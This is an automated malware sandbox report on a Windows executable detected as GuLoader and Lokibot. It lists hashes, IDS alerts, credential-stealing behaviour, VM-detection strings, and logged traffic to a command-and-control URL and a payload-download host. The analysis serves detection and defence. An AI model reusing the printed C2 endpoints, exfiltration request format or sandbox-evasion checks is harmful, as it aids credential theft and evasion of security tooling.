Windows Analysis Report
HfJLn9erXb.exe

Overview

General Information

Sample Name: HfJLn9erXb.exe
Analysis ID: 829104
MD5: 049ecad4587538c292e3ebeee5947eb5
SHA1: 12aabeb19083dd114b7b94c836b031de3945d2c9
SHA256: cf9a08d65a0b472b1ed84638a09d39d741f34e9cd2641092141a9bf1a5f796a6
Infos:

Detection

GuLoader, Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Lokibot
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
One or more processes crash
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: HfJLn9erXb.exe ReversingLabs: Detection: 51%
Source: HfJLn9erXb.exe Virustotal: Detection: 53% Perma Link
Antivirus detection for URL or domain
Source: http://185.246.220.85/habrik/five/fre.php Avira URL Cloud: Label: malware
Uses 32bit PE files
Source: HfJLn9erXb.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: HfJLn9erXb.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIIRadeonHelper.pdb source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr
Source: Binary string: mshtml.pdb source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: mshtml.pdbUGP source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_0040626D FindFirstFileA,FindClose, 2_2_0040626D
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 2_2_00405732
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_004026FE FindFirstFileA, 2_2_004026FE

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.11.20:49802 -> 185.246.220.85:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49802 -> 185.246.220.85:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49802 -> 185.246.220.85:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.11.20:49802 -> 185.246.220.85:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.11.20:49802 -> 185.246.220.85:80
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 85.95.248.49 85.95.248.49
Source: Joe Sandbox View IP Address: 185.246.220.85 185.246.220.85
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /jgEyxsZj50.ttf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ruhsalgelisim.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /habrik/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.246.220.85Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE3769AContent-Length: 178Connection: close
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.85
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: HfJLn9erXb.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: HfJLn9erXb.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: HfJLn9erXb.exe, 00000007.00000002.1394683653.0000000002310000.00000004.00000020.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1394683653.00000000022A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruhsalgelisim.com/jgEyxsZj50.ttf
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.gopher.ftp://ftp.
Source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000626000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: HfJLn9erXb.exe, 00000007.00000001.1217313379.00000000005F2000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: HfJLn9erXb.exe, 00000007.00000001.1217313379.00000000005F2000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: HfJLn9erXb.exe, 00000007.00000003.1356636697.0000000032480000.00000004.00001000.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000003.1356636697.000000003248A000.00000004.00001000.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1394683653.00000000022A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: HfJLn9erXb.exe, 00000007.00000003.1356636697.000000003248A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: HfJLn9erXb.exe, 00000007.00000003.1356636697.000000003248A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: HfJLn9erXb.exe, 00000007.00000002.1394683653.00000000022A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/tft
Source: HfJLn9erXb.exe, 00000007.00000003.1356636697.000000003248A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: unknown HTTP traffic detected: POST /habrik/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.246.220.85Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE3769AContent-Length: 178Connection: close
Source: unknown DNS traffic detected: queries for: ruhsalgelisim.com
Source: global traffic HTTP traffic detected: GET /jgEyxsZj50.ttf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ruhsalgelisim.comCache-Control: no-cache
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_004051CF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 2_2_004051CF
Uses 32bit PE files
Source: HfJLn9erXb.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
One or more processes crash
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2912 -s 1368
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 2_2_004031D6
Detected potential crypto function
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_00404A0E 2_2_00404A0E
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_004065F6 2_2_004065F6
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_735D1A9C 2_2_735D1A9C
Sample file is different than original file name gathered from version info
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAEGISIIIRadeonHelper< vs HfJLn9erXb.exe
Tries to load missing DLLs
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Section loaded: edgegdi.dll Jump to behavior
PE / OLE file has an invalid certificate
Source: HfJLn9erXb.exe Static PE information: invalid certificate
Source: HfJLn9erXb.exe ReversingLabs: Detection: 51%
Source: HfJLn9erXb.exe Virustotal: Detection: 53%
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File read: C:\Users\user\Desktop\HfJLn9erXb.exe Jump to behavior
Source: HfJLn9erXb.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\HfJLn9erXb.exe C:\Users\user\Desktop\HfJLn9erXb.exe
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process created: C:\Users\user\Desktop\HfJLn9erXb.exe C:\Users\user\Desktop\HfJLn9erXb.exe
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2912 -s 1368
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process created: C:\Users\user\Desktop\HfJLn9erXb.exe C:\Users\user\Desktop\HfJLn9erXb.exe Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 2_2_004031D6
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File created: C:\Users\user\AppData\Roaming\fumigatorium Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File created: C:\Users\user\AppData\Local\Temp\nsk2AD0.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/19@1/2
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_004020D1 CoCreateInstance,MultiByteToWideChar, 2_2_004020D1
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_0040449B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 2_2_0040449B
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Mutant created: \Sessions\1\BaseNamedObjects\28278665D4ACB73EF64D459A
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File written: C:\Users\user\AppData\Local\Temp\Kontos.ini Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Jump to behavior
Source: HfJLn9erXb.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIIRadeonHelper.pdb source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr
Source: Binary string: mshtml.pdb source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: mshtml.pdbUGP source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: Process Memory Space: HfJLn9erXb.exe PID: 8604, type: MEMORYSTR
Source: Yara match File source: 00000002.00000002.1379713929.000000000348C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_735D2F20 push eax; ret 2_2_735D2F4E
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_03335F04 push es; ret 2_2_03335F06
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_033303E6 push 620F66DAh; iretd 2_2_033303EB
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_03330E2F push ds; ret 2_2_03330E38
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_0333208F push edx; retf 2_2_03332090
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 7_2_01665F04 push es; ret 7_2_01665F06
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 7_2_016603E6 push 620F66DAh; iretd 7_2_016603EB
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 7_2_01660E2F push ds; ret 7_2_01660E38
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 7_2_0166208F push edx; retf 7_2_01662090
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_735D1A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 2_2_735D1A9C
Drops PE files
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File created: C:\Users\user\AppData\Local\Temp\nsb2DEE.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File created: C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Dykereeve\Jackbsningen\Telescopiform\Bestridende\AEGISIIIRadeonHelper.dll Jump to dropped file
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Dykereeve\Jackbsningen\Telescopiform\Bestridende\AEGISIIIRadeonHelper.dll Jump to dropped file
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_0040626D FindFirstFileA,FindClose, 2_2_0040626D
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 2_2_00405732
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_004026FE FindFirstFileA, 2_2_004026FE
Source: C:\Users\user\Desktop\HfJLn9erXb.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\HfJLn9erXb.exe API call chain: ExitProcess graph end node
Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: HfJLn9erXb.exe, 00000007.00000002.1394683653.0000000002318000.00000004.00000020.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1394683653.0000000002324000.00000004.00000020.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1394683653.00000000022A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Contains functionality to dynamically determine API calls
